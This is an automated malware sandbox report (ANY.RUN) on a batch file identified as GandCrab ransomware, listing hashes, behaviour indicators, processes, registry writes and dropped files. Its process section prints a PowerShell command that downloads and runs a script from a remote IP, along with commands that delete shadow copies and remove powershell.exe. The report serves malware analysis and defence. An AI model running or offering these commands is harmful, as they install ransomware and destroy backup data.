General Info

File name

test_ran.bat

Full analysis
https://app.any.run/tasks/d24525c5-a64a-4773-9332-9837526b4e32
Verdict
Malicious activity
Analysis date
11/8/2018, 08:56:03
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

trojan

ransomware

gandcrab

Indicators:

MIME:
text/plain
File info:
ASCII text, with no line terminators
MD5

9759d57f3a07768129aeeb1539d46c37

SHA1

05142daac55aff04aa6eda6db8962d3739a71eea

SHA256

c14013b44dfc2643a3bd32b17d5e55ff124be64e313abd5725c5b25b63ae2869

SSDEEP

3:VSJJLNW4Fjn8tSXRKBJ9KLxKCQDmkdFMWEOtRjmnMXRLO9FX0:snW4pP0zmKtCkTqOtRjmnMB60

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
300 seconds
Additional time used
240 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
off

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Dropped file may contain instructions of ransomware
  • powershell.exe (PID: 672)
Connects to CnC server
  • powershell.exe (PID: 672)
Request from PowerShell which ran from CMD.EXE
  • powershell.exe (PID: 672)
Deletes shadow copies
  • powershell.exe (PID: 672)
Renames files like Ransomware
  • powershell.exe (PID: 672)
Writes file to Word startup folder
  • powershell.exe (PID: 672)
Executes PowerShell scripts
  • cmd.exe (PID: 3800)
GandCrab keys found
  • powershell.exe (PID: 672)
Actions looks like stealing of personal data
  • powershell.exe (PID: 672)
Starts CMD.EXE for commands execution
  • powershell.exe (PID: 672)
Reads Internet Cache Settings
  • powershell.exe (PID: 672)
Creates files like Ransomware instruction
  • powershell.exe (PID: 672)
Creates files in the user directory
  • powershell.exe (PID: 672)
Reads settings of System Certificates
  • powershell.exe (PID: 672)
Dropped object may contain TOR URL's
  • powershell.exe (PID: 672)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

Screenshots

Processes

Total processes
50
Monitored processes
7
Malicious processes
2
Suspicious processes
0

Behavior graph

+
start cmd.exe no specs #GANDCRAB powershell.exe wmic.exe no specs explorer.exe no specs notepad.exe no specs cmd.exe no specs timeout.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3800
CMD
cmd /c ""C:\Users\admin\Desktop\test_ran.bat" "
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\apphelp.dll

PID
672
CMD
powershell.exe IEX ((new-object net.webclient).downloadstring('http://198.211.105.99/kasa'));Invoke-SZYIITYRAYH;Start-Sleep -s 1000000;
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\iconcodecservice.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\credssp.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\cryptnet.dll
c:\windows\system32\cabinet.dll
c:\windows\system32\devrtl.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\oleacc.dll

PID
3192
CMD
"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Path
C:\Windows\system32\wbem\wmic.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
2147749908
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\wininet.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wbem\wmiutils.dll

PID
1880
CMD
"C:\Windows\explorer.exe"
Path
C:\Windows\explorer.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Windows Explorer
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\explorer.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\slc.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\propsys.dll
c:\windows\system32\cryptbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\actxprxy.dll

PID
1608
CMD
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Videos\BCAHATTDX-DECRYPT.txt
Path
C:\Windows\system32\NOTEPAD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Notepad
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\notepad.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\winspool.drv
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\uxtheme.dll

PID
2420
CMD
"C:\Windows\System32\cmd.exe" /c timeout -c 5 & del "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /f /q
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\timeout.exe

PID
2900
CMD
timeout -c 5
Path
C:\Windows\system32\timeout.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
timeout - pauses command processing
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\timeout.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

Registry activity

Total events
442
Read events
356
Write events
86
Delete events
0

Modification events

PID
Process
Operation
Key
Name
Value
672
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
672
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
672
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
672
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
672
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
672
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
672
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
672
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
672
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
672
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
672
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
672
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
672
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
672
powershell.exe
write
HKEY_CURRENT_USER\Software\ex_data\data
ext
2E006200630061006800610074007400640078000000
672
powershell.exe
write
HKEY_CURRENT_USER\Software\keys_data\data
public
0602000000A400005253413100080000010001004F6E8DAB9A0FB1421BCEB82308FD521E326DB9FDC091CC6746C2163C2B84D763EA249BB756EF02850E5D9B96634825FFB9C9D705182E395B925A281F482D8AFE0652D808216B24AFDE2F51D3938821E4A63009D2F17994630E1B7FDA44AD29777B34EEEA86620286C169B23D91C5CFBC951B6C48A7E65F5EAD355A9653F96CF4B797691A639756750BF1475AECA6F1E85EDAE0B2E3C8381E9C2A2D0FCD950A408C4E4851BDFBEF9426D7ADC0263D4CE8F2028BA05C0701428718F3CE386345CD67722135DB0CEBA468A4D2B248E99EE8F41E9A2F776F94F1CAD304316083F87D6AF7DD898ABF2ECC7994BB9705E3732955B218C5BDEC3B325D7B9CD91EC675CC
672
powershell.exe
write
HKEY_CURRENT_USER\Software\keys_data\data
private
940400007C69AAFE6DB7ED4DF9163E593F9C0D29EFC604E71D2542185CB466617D4ADA964DC3F14D508724310E8602C1C0BD0482FFC17C960AFA009B82AC12F355DFDAE3E34E7B45612D3784E323B1BAA813A0ADE5583505EC70EA928A23F56A0269D6BB0EB6292B04709FBDFC75912A2FE9D73A671D5B3A6C5DA04A7ED8344E78CD82FB0D222D7E0EACEF262988FC707CB2BCCBCB402649F61423C617E2D5FB3500D6DB545290BF54A8FB818C61E5194351C49D8997629CA0153BB1824CFE5E1C67DAE66432EB45F4274811F3A91B470AE2D6AF6B044EE487B350560B5AD2611020F878D90949212B791A198A56C48480C39A77BC9C9B22345BF66E5BAA32E34E594889A5A0405C102F84B66032B9266479D0E3693552ED2BA4BA207393BB76D444F1FED1CBA3525B2B356D61A8B8D8F0BD307E2C06AE510D1CEA10CDB0B9465CDE8459E84D0C747980802DDD1F3F663C81B4B818BB33B8949AA0960A8E4FB0EBACEF46F035D593DA978A254765617B528A9EE6F44037E294F912D969726C1F4AB1D6DB1BDC4E1C5768BB70FFDA74BB6E1701499C33A7A915CBD5B17B29CAC78A8861D80C4D7C2D0A28CF783C792F9E099AB3D114003CA8155EDA2C69BCAF0E8E18287446C9901E17FE37B0FD3B3BDFAB1979C54829A683020016EAB61C9552DEE0FBAA73A84845AD41DFD2AEA6DB31CA213BCC1B76800B37B8B12783444FC842EC993A8ECB8EF3C4672279ACEFF3FCA3A185CC059C01096D0CF1770055B31F8C71672577FAF9108B8C6270D63DF7D6665EBC11A343A2E81BDF12DD891CED3EE272C6E30E1B56DBFB62FDE0141B28353786A1EA77E15B8A2409C058FCD23F7CE90AFBD66162408B8E8BE37509B359C03CC98E0627833BCE20138F265D9C1C1B71AC5A0D661D67B8676EB084959143E2F4C45562B63F2B22C4380C9CB0E9476C1097E04508B553901EDA545BBB7CD080BE93CCB52C3C860370BC8B8DEF780E1262202D184B6D35567287B961E8BE92CDB162B7579747B077A0BD682070EFB62EFFF00F4C0117F7B02F22373BAFFE2C602A2E030D9DE427BA011796AC071B9E487F8BA042806E2DFC0046F33C7F22632494B5511424E84D680AD9FB5DFEC59B85ED74F8F5E5D207F95A7DDEB1C31C8E377544EC4A9E1648AD13AC8A27B3AB1CDED7DF0E36B6D85F014872C69A67916A4D540656A93CB36E0C60101882F0BE2F2761CA14FC2CF9EA52C4EAE5C7A043D74911616824CE5E4F15DC49D0CEE4E2A6942F4A19423CD1E346FDBF698ADAD559A70904A3E8D884B986C7B96ADB7BB11DA951EE957FBAA98C032EFAC6752F0F577C70E9622DE2E4A8C663BC6860108B186EF67DBDEC8F06DEA40A2C92FE36C21A188ADAB35E3CBDB8F38F8FB83D14CD234C515EA9C257356B6FAEA6699E462817ECAC2E28820390E51685F6463DD0A5EA2B0BDF3F0B7637C51AD90F322E23103BB794CD3901682D3143E093CA37614B509D9A35CFF5E9B112316F5C412368E795EC5A6D1056ACADF10624140165760ED0F68FEAED4C5D91B49C0C742F43D701C132DD367DFE3689B19C158950623B59BB57417B7F2F7E5078A5094E69168D484D94F10DA1A1538F3E61EE535C6985FCD027DAE36D263A9CC861EFE2C1866793716FBEB0D4D6EA5CDB6360A15A191C3B7F55F03C5A832114EAD71BE73742CB7D1A9A354523A77C2A4D69C581736C4548B8B4508DA76BF8240121E78AF39D9B45DE1CE4BF3071D877106EC85D92528BA42D9F28D2426EADBA244556C819EDE4E6BB5FFBABDFFCCCEC21D085C6F5380BD364178837E2628C6AFCE04991733A0C092BB63CC716A8D9750A90CA24F8DBE61FA4FEBEC779E659DBF49443EFD31DF50D8DC2781CDDC8594FE0667A4B4E75A9A3E7CA45BD2F90C3AF55CE31EBA08F765AE94F830C3EAF23F8462D794F892A12FF52261BB4D99130ADE07C1EE118CFA54F44F599992FE46FAAB15077281F139F5C5A0E91D90821B8889335395DA7A79615A4E6A936F7748989C55D96AB527AC303DF59D7FB9920F14827C01746AFD48A495183B40228920594D38F9BD720307BED3D6290CFF2EA513D0BC580D29BA3E3148B697F50C7664A16A8D031D6F2F8AA07C80BEB960933218D0F888EE7248CD96CCC5FEC4C372F9EE202740C6B443E188B8ED12728D7B461F7590C337B2F1E9D516C8D679D4CB11CE5328167AC2032F03EE242909F9C5F4AC9BDD5E69D53317AB18860DDDD8567C51CD2DE69FF84FDA9A22D581C0643E81DFE7DB62E1440AD211B433C7E4A08B42A1E5E0F2722CF06009C28A6FCDE0CD95EB4564D065051D802FE6E7D1F25DDDBCAB27898E62576AFFFB5BE2368ACE49DAC1E79992000F13A23BCAADE4A0102A0393224F3
672
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
672
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
672
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
672
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000

Files activity

Executable files
0
Suspicious files
271
Text files
231
Unknown types
12

Dropped files

PID
Process
Filename
Type
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 1854925e2d964864c55f98beeb1fc9ab
